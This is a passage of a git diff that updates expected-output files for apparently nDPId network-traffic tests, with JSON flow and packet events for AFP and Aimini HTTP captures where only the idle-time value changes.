+00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":162,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643275952364} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 diff --git a/test/results/aimini-http.pcap.out b/test/results/aimini-http.pcap.out index 44d4aa680..2ba169648 100644 --- a/test/results/aimini-http.pcap.out +++ b/test/results/aimini-http.pcap.out @@ -1,29 +1,29 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"aimini-http.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614860228394} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229383,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229383,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229383,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229383,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="} 